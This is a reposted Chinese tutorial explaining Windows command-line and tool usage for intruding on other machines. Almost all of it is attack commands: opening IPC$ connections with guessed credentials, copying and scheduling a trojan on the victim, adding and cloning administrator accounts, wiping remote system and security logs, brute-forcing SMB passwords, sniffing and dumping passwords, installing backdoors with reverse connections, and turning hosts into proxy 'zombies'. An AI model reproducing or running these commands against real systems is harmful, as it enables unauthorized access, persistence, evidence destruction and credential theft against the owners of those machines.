分享

windows下dos攻击、入浸的一些命令讲解

 拼搏 坤 2012-06-29

windows下dos攻击、入浸的一些命令讲解

2010-08-12 14:40:19 来源: 作者:
 一些常用的net命令与例子:ip地址我就以192.168.1.1为例了,一般像我们不能连接却不能进行其它的操作时,可以把防火墙给关掉net stop
 一些常用的net命令与例子:ip地址我就以192.168.1.1为例了,一般像我们不能连接却不能进行其它的操作时,可以把防火墙给关掉net stop

  sharedaccess

  1、建立ipC连接或是直接映射的命令

  net use \\ip\ipc$ password /user:username

  net use \\ip\abc username:admin$123

  例如:

  net use \\192.168.1.1\ipc$ 123456 /user :administrator

  这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机192.168.1.1建立ipc$空连接

  2、 删除ipC$空连接

  net use \\ip /del

  例如:

  net use \\192.168.1.1 /del

  删除与主机127.0.0.1已经建立的ipc$连接

  3、启动关闭服务:

  net start    \\查看已经开启的服务

  net start servername

  net stop servername

  例如:

  net start telnet   \\开启telnet服务

  net stop telnet    \\关闭telnet服务

  4、启动关闭共享

  net shate ipc$    \\开启ipc$默认共享

  net share ipc$ /del   \\关闭ipc$默认共享

  net share c=c:\    \\完全共享c盘

  net share d=d:\    \\删除完全共享的d盘

  net share e$=e:\   \\建立隐藏共享e盘

  5、映射硬盘

  net use z: \\ip\c$

  例如:

  net use z: \\192.168.1.1\c$    \\把192.168.1.1的C盘映射成本机的z盘

  说明:映射成功后,你在我的电脑里面里面就会多出一个硬盘Z,其实Z就是192.168.1.1的C盘!

  net use z: /del      \\断开映射

  入侵中的作用:把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了

  成功实现的条件:必须与对方建立ipc$连接

  6、远程复制文件_Copy

  Copy e:\3389.exe \\192.168.1.1\c$   \\将本地的E盘下的3389.exe这个文件copy到对方192.168.1.1系统的C盘根目录下

  Copy在入侵中的作用:把本地文件复制到对方硬盘

  Copy复制成功所需的条件:必须与主机建立ipc$连接

  7、 查看远程系统的时间

  net time \\ip

  net time \\192.168.1.1    \\查看远程主机192.168.1.1的本地时间

  作用:得到对方时间好为自己计划任务种下木马做准备

  8、 远程运行程序

  At \\ip time server.exe

  At \\192.168.1.1 12:30 c:\server.exe    \\让主机在中午12:30分运行我们已经复制到他C盘根目录下的木马server.exe

  在入侵中作用:这样我们就可以用我们的木马服务端来连接我们木马,,更好的使用图形方式来控制肉鸡.(推荐使用神气儿 ^_^)

  9、添加管理员账号:

  net user ylinuxs 123456 /add    \\添加一个密码为123456名字为 ylinuxs的用户

  net localgroup administrators ylinuxs /add   \\把ylinuxs这个用户提升为管理员或是叫加入到管理员组都是对的

  注意:有些系统的管理员组不是administrators你要根据实际情况来改,不过99.9%的系统的管理员组还是administrators的。

  修改用户密码:

  net user ylinuxs 123    \\把用户ylinuxs的密码修改成123

  10、远程登陆主机_telnet

  telnet ip port

  例如:telnet 192.168.1.1 135   \\连接登录192.168.1.1的135端口

  (当目标主机的端口是默认的23的时候我们不

需要+端口即:telnet ip 就好)

  11、传输文件命令_ftp

  其实这个我个人觉得用途不大,毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢?

  首先在CMD里面输入ftp

  然后输入:open ip port

  例如:open 192.168.1.1 123    \\连接登陆192.168.1.1的123端口

  如何开启windows系统自带的ftp服务:

  net start msftppsvc

  12、 查看文件夹的属性_cacls

  Cacls ylinuxs    \\查看ylinuxs这个文件夹的属性

  参数说明:F:(完全控制)R:(只读)C:(允许更改)W:(允许写入)N:(没有任何权限)
  
   13、删除文件_del

  del是用来删除文件命令

  首先进入你想删除的文件的目录

  del ylinuxs.txt   \\删除ylinuxs.txt这个个文件

  del ylinuxs.txt /f \\强制删除ylinuxs.txt这个个文件(当该文件无{MOD}常删除的时候使用该命令)

  14、 finger命令

  Finger是一个信息刺探命令一般在对方开启了79端口时命令使用

  Finger –l user @computer

  参数详解: -l 用长列表格式显示消息

  User:指定用户的信息

  成功实现的条件:对方必须安装tcp/ip协议

  15、文件写入命令_echo:

  Echo hello > index.htm   \\用hello来覆盖index.htm的内容

  Echo hello >>index.htm   \\将hello添加到index.htm

  16、写入注册表文件_regedit

  Regedit /s filename.reg \\s是写入参数

  17、端口映射_chgport

  Chgport 3=5   \\将端口3映射到5

  Chgport /d*   \\删除所有端口映射

  18、文件映射_subst

  subst b: c:\windows \\这个时候当你访问硬盘b的时候你就是访问了 c:\windows目录了,不过这样是非常危险的

  subst b: /D   \\删除映射的盘b

  19、查看当前正在使用的账号:

  query session   \\查看账号

  20、踢掉指定用:

  logoff id    \\注意ID,是在用query session查看到的用户的id而不是用户名。

  21发送消息给某用户或者内网主机

  net send hostname or /ip message

  例如:net send ylinuxs or /192.168.1.1 hello!   \\给主机名为ylinuxs或是ip为192.168.1.1发送消息为hello!

  CMD的内部基本入侵命令讲解完毕,现在我们来讲讲他的外部命令,也就是借用外部DOS小工具的方法:

  (二)CMD外部一部分小工具的使用方法:

  1、opentelnet:一个在得到对方用户名与密码的情况下远程开启对方telnet的程序

  命令语法:opentelnet \\ip username pass ntml port

  例    子:opentelnet \\192.168.1.1 administrator 123456 1 3800

  开启主机192.168.1.1的telnet服务,并且端口设置在3800(当连接的时候就需要telnet 192.168.1.1 3800了)1是NTML的验证值,就是说,我们需要

  输入登陆用户名与密码才能登陆。

  该命令成功实现的条件:对方没有装防火墙,并且ipC$服务开启

  telnet.vbe:一个不基于ipC$是否开启直接开telnet的工具

  命令语法:cscript telnet.vbe 192.168.1.1 username pass ntml port

  这个与上面哪个opentelnet的使用含义是一样的

  该命令成功实现的条件:对方没有装防火墙

  2、Pslist:查看系统进程的工具或是windows内部自带的tasklist命令

  Pskill:杀除系统进程的工具或是windows内部自带的taskkill命令

  进入工具目录直接输入:pslist即可以查看系统进程如下图:

  杀死或叫结束进程

  Pskill pid 进程号

  taskkill /PID 进程号   \\若结束不了,可加上/F强行结束

  3、fport:一个查看系统程序所对应的端口的工具或windows自带的netstat 或加上-an参数

  4、远程删除日志:

  Cleanlog.vbe

  命令语法:

  Cscript cleanlog.vbe ip username pass system –all   \\删除系统日志

  Cscript cleanlog.vbe ip username pass application –all   \\删除应用程序日志

  Cscript cleanlog.vbe ip username pass secutity –all   \\删除安全日志

  使用的优势:无须对方开启ipc$共享

  5、远程开启关闭重启主机:

  Reboot.vbe

  Cscript Reboot.vbe ip username pass –r   \\重启目标主机

  Cscript Reboot.vbe ip username pass –s   \\关闭目标主机

  Cscript Reboot.vbe ip username pass –I   \\注销目标当前用户

  Cscript Reboot.vbe ip username pass –p   \\关闭目标电源

  使用的优势:无须对方开启ipc$共享

  6、端口重定rinetd and fpipe

  首先说说rinetd的使用

  首先我们配置一个文件ylinuxs.txt这样配置一般都很简单,一般下载下来的软件里面都有说明的,只须按照它所说的步骤一步步来就可以了。

  ylinuxs.txt内容如下:

  ip1 21 ip2 3389   //释:ip1是主机ip ip2是要接受的内网主机ip,既整个命令的意思是当你连接ip1主机(公网ip)的21端口的时候,主机一(ip1

  )会把他21端口接收到数据发到内网主机(ip2)的3389。也就是你连接ip1主机的21端口,实际上就是连接ip2的3389端口。

  命令:rinetd.exe –c ylinuxs.txt

  工具2:fpipe

  使用命令:fpipe –v –l 53 s 53 –r 23 主机ip

  例子:fpipe –l 80 –s 90 –r 80 127.0.0.1

  释:将本机的80端口接收到的数据通过本机的90端口直接转发到127.0.0.1的80端口

  7、SNMP弱口令的利用:

  工具:Snmputil

  Snmputil [get|getnext|walk]agent id     \\语法格式

  Snmputil walk 192.168.1.1 ylinuxs.1.3.6.1.4.1.77.1.2.25.1.5   \\查询帐户

  Snmputil walk 对方ip public.1.3.6.1.2.1.25.4.2.1.2   \\查询系统进程

  Snmputil walk 对方ip public.1.3.6.1.4.1.77.1.2.25.1.1   \\查询用户列表

  Snmputil walk 对方ip public .1.3.6.1.2.1.1    \\列出对方系统信息

  该工具的作用:查询一部分系统而已

  我个人这个没有很大的作用,查看到了系统信息,要攻破还是需要运气

  8、暴力破解系统密码

  Smbcrack

  Smbcrack ip username 字典路径 端口

  说明:首先你需要用字典自己做一个字典,用户名建议是administrator 因为这个是系统默认的管理员估计大多数人的主机这个账号还是存在的,端口可以是139、137、445等系统开启的netBOIS协议端口就可以!

  9、小巧的嗅叹器_xsniff(若有需要还可以用sniffer,对于sniffer全是英文的,没有一个月,一般人拿来用处不大,若你精通了,那可就厉害了,若想

  下载或是想学习去http://hi.baidu.com/ylinuxs/blog/item/2202cb408ef79c1c9313c634.html,上面有说明文件.)

  Xsniff是一个小巧的嗅叹器,可以嗅叹UDP/TCP协议的信息

  使用语法:

  Xsniff –pass –hide –log c:\pass.log –pass

  c:\pass.log 是保存记录文件,建议选择一个深的目录,可以自定义

  性能参数:

  -hide 隐藏在后台运行          -log:生成嗅叹的日志文档

  Pass.log:嗅叹的日志文档文档名,可以自定义

  -TCP:捕获TCP数据包

  -UDP:捕获UDP数据包

  -ICMP:捕获ICMP数据包

  -HOST:主机名或ip地址

  -PORT:指定端口嗅叹

  -ASC输出出时保存为ASCII格式

  10、SFIND 命令行扫描器

  例子:

  Sfind –p 3389 192.168.1.1 192.168.1.255

  扫描192.168.1.1段的1-255主机的3389端口

  Sfind –cgi 192.168.1.1    //扫描192.168.1.1的cgi漏洞

  Sfind –ftp 192.168.1.1    //扫描192.168.1.1的ftp漏洞

  Sfind –idq 192.168.1.1    //扫描192.168.1.1的idg漏洞

  11、克隆账号CA:

  CA.EXE \\ip administrator “” guest 123

  将GUEST账号克隆成管理员

  Administrator 的密码为空用”” guest的密码是123

  12、后门使用:

  这里我介绍小榕的bits

  说明:BITS必须放在system32目录下才可以安装

  安装命令:rundll32.exe BITS.dll install rasato ylinuxs \\指定后门特征为ylinuxs

  连接激活:

  正向连接(用nc连接即可):ylinuxs:@ip[xell]:99

  反向连接:ylinuxs:@ip[rxell]:yourip:port

  卸载:rundll32.exe BITS.dll uninstall

  同时也介绍T-CMD

  安装命令:

  t-cmd –install

  然后:telnet ip 20540

  就可以了,T-CMD是菜鸟的好选择

  13、系统密码查看_showpass

  直接进入showpass的目录直接运行showpass只要当前用户在线,那么showpass就可以把他的密码从内存里找出来。

  14、代理肉鸡的制作_SK

  安装命令:

  sk.exe –install   \\安装SK

  sk.exe -config port 4999 \\设置端口为4999

  sk.exe -config starttype 2 \\设置启动项为自启动

  net start skserver   \\启动SK代理服务

  15、SQL弱口令利用

  我本来在这里不想说这个,但是希望大家能够综合利用所以我就直接说了。(SQL的弱口令大家可以用WINDOWS 2000自动攻击探测器扫描.)

  Sqlexeca.exe ip sa 123

  因为是弱口令,所以用123表示,同时也告诉大家SQL服务器的最高权限帐户是SA,这个是不能更改的!

  16、终端服务的开启与使用

  这个恐怕就是菜鸟们最喜欢的话题了一个图形话的交互界面

  工具:3389.exe 3389.vbe 3389.bat

  方法一:3389.exe:只需要把此文件复制到你所要开启的服务器运行此程序就可以了。

  方法二:3389.vbe:这个是一个脚本文件,使用方法如下:

  Cscript 3389.vbe ip username pass port /r    //密码必须是管理员密码 port是终端的端口,这个是可以自己定义的,参数.r是说

  明开启成功自动重启动服务器!你也可以使用/fr,FR的意思就是强制重新启动服务器!

  方法三:3389.bat:这个是一个BAT文件利用批处理来开3389网络上很多相关资料大家可以参考参考,3389.bat的内容如下:

  echo [components] > d:\ylinuxs

  echo tsenable=on >> d:\ylinuxs

  sysocmgr /i:d:\winnt\inf\sysoc.inf /u:d:\ylinuxs /q

  大家可以把上述代码保存一个bat然后放到要开3389的服务器上,在CMD下运行,服务器的3389就开启了。

  终端的连接:

  这里推荐使用2003或者XP的终端登陆器,然后系统会提示你输入账号与密码,输入以后直接登陆就可以了!

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多